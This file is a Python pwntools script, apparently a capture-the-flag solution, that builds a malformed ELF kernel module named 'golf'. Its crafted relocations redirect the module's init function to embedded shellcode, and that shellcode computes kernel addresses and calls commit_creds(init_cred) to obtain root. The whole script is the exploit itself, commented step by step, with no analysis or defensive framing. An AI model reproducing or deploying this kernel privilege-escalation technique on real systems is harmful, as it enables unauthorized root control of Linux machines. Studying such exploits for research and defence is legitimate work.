#!/usr/bin/env python3

from pwn import *
import os

context.arch = "amd64"

class Ehdr():
    def __init__(self):
        self.ei_class = 2
        self.ei_data = 1
        self.ei_version = 0
        self.ei_osabi = 0
        self.ei_abiversion = 0
        self.ei_pad = b"\x00"*7
        self.e_type = 1
        self.e_machine = 0x3e
        self.e_version = 0
        self.e_entry = 0
        self.e_phoff = 0
        self.e_shoff = 0
        self.e_flags = 0
        self.e_ehsize = 0
        self.e_phentsize = 0
        self.e_phnum = 0
        self.e_shentsize = 0x40
        self.e_shnum = 0
        self.e_shstrndx = 0
    def __len__(self): return 0x40
    def create(self):
        e = b"\x7fELF"
        e += p8(self.ei_class)
        e += p8(self.ei_data)
        e += p8(self.ei_version)
        e += p8(self.ei_osabi)
        e += p8(self.ei_abiversion)
        e += self.ei_pad
        e += p16(self.e_type)
        e += p16(self.e_machine)
        e += p32(self.e_version)
        e += p64(self.e_entry)
        e += p64(self.e_phoff)
        e += p64(self.e_shoff)
        e += p32(self.e_flags)
        e += p16(self.e_ehsize)
        e += p16(self.e_phentsize)
        e += p16(self.e_phnum)
        e += p16(self.e_shentsize)
        e += p16(self.e_shnum)
        e += p16(self.e_shstrndx)
        assert len(e) == 0x40
        return e

class Shdr():
    def __init__(self, sh_type):
        self.sh_name = 0
        self.sh_type = sh_type
        self.sh_flags = 0
        self.sh_addr = 0
        self.sh_offset = 0
        self.sh_size = 0
        self.sh_link = 0
        self.sh_info = 0
        self.sh_addralign = 1
        self.sh_entsize = 0
    def __len__(self): return 0x40
    def create(self):
        e = p32(self.sh_name)
        e += p32(self.sh_type)
        e += p64(self.sh_flags)
        e += p64(self.sh_addr)
        e += p64(self.sh_offset)
        e += p64(self.sh_size)
        e += p32(self.sh_link)
        e += p32(self.sh_info)
        e += p64(self.sh_addralign)
        e += p64(self.sh_entsize)
        assert len(e) == 0x40
        return e

def mkrela(offset, info, addend=0):
    return p64(offset) + p64(info) + p64(addend)

out = b""
# calculates kernel addresses from return address
# to call commit_cred(init_cred)
code = asm("""
    pop rbx
    push rbx
    add rbx, 0xb6b08
    push rbx
    pop rdi
    add rdi, 0x199aea0
    jmp rbx
""")

ehdr = Ehdr()
ehdr.e_shoff = 0x10
ehdr.e_shstrndx = 1
ehdr.e_shnum = 3

strtab = b".gnu.linkonce.this_module\x00"
symtab = Shdr(2)
symtab.sh_size = len(strtab)+4
symtab.sh_flags = 0x42
symtab.sh_name = 4
symtab.sh_link = 1

# relocate init to our shellcode
rela0 = mkrela(0x3138, 1, 0x2df8+0x78)
# set init_layout.base to not segfault
rela1 = mkrela(0x3190, 1, 0x2df8)
# set data_layout.base to not segfault
rela2 = mkrela(0x3140, 1, 0x4df8)
# set init_layout.text_size so our segment is marked exectuable,
# also fit some shellcode in here since it's a 4 byte reloc with an 8 byte addend
rela3 = mkrela(0x319c, 4, 0x7fb2|(u64(code[:6].ljust(8, b"\x00"))<<0x10))

relas = Shdr(4)
relas.sh_size = len(rela0)*4 + len(code)-6
relas.sh_flags = 2
relas.sh_info = 2

out += ehdr.create() + b"\x00"*0x10
data = b""
total = len(out) + len(symtab)*2

symtab.sh_offset = total-4
data += strtab
total += len(strtab)

relas.sh_offset = total
data += rela0 + rela1 + rela2 + rela3
data += code[6:]

out += symtab.create() + relas.create() + data
print(len(out))
# null heap spray for stability
out = out.ljust(0x400, b"\x00")

f = open("golf", "wb")
f.write(out)
f.close()

os.system("xxd -i golf >golf.c")
